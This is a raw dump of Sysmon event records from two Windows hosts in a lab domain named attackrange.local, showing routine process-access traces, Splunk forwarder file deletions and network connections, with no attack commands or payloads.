RT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001056468Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056467Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056466Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.092{5EBD8912-8CD0-6151-2C00-00000000FD01}24245224C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 23542300x80000000000000001056504Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:50.546{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C000934C39532DF7A57115FC439D0A8,SHA256=129C99CC4AF89ABFFEB30665D2DCAAB3512BF623F1D2C7F1E330A1DA8FB54741,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981096Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:50.399{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=413C4138B64D121E89DD1999A72F9773,SHA256=F37FEC397F6DAA6F3975B64718CE16BD52B68F997C93A7A03FC782E8DEA4E4E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056505Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:51.780{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCE86D852903C5E1C2BFD3ED6005A26D,SHA256=7F96F224D54A39D53B81AC191449CF5E1501C90498092A252B312C54CD13A00B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981097Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:51.602{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE8E6A3384EBBA28BF58A18287EBF537,SHA256=323EE769B20B25A37287534F3E03A407A36296F2F5B3549AB87A32483FE207C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056507Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:52.906{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E5283541DFF812944A787FFFE02FD9C,SHA256=6A1AE81A436643CBE7A52178464EF21399007943DCCFAB51AB2ED4DB131FA810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981098Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:52.649{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=368CE8D77A15855C3E388270B3F9DEBD,SHA256=726B1F561A6CEA2B3A29B3BF78A1EACB78CA9993C9E0F5AFBD4188017623A665,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056506Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:50.487{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\explorer.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local54226-false20.199.120.85-443https 23542300x8000000000000000981099Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:53.868{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36AD451FFDA6DCFC0912355ED7FC2D12,SHA256=FCC306FE4BC20D203CF3B9D86259C274B0E42AFE0D0D04527E65B08C20B3659E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056509Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:53.359{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e4d|C:\Windows\System32\SHELL32.dll+61dd0|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056508Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:53.359{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001056520Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:53.112{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54227-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001056519Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:54.093{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056518Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:54.093{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056517Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:54.093{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056516Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:54.093{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056515Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:54.093{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056514Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:54.093{5EBD8912-8D29-6151-8D00-00000000FD01}41364420C:\Windows\system32\sihost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056513Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:54.062{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056512Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:54.062{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056511Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:54.062{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001056510Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:54.047{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D35ABBFD3CAE4113B2E955B1C6571EC5,SHA256=D576FC75AB189D9DC2E17F125869795BC5D517B7F26A8EAF95E4712FB0B93819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056521Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:55.062{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39D8C0B6DCEAC217A8DE1A92D1B708F2,SHA256=688CB430757356CC06A8DBD4AEDC2F61A36A3C6E9962E62E5AC486E9188077B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981101Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:51.896{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59529-false10.0.1.12-8000- 23542300x8000000000000000981100Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:55.071{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABCE0546B73E3706F85648FE5174DD00,SHA256=2563F2F9AE8CC5847DA0DF486ABEBA5E2D87804BDF20FED90DCB2FF620EDA056,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981105Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:53.438{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54513-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 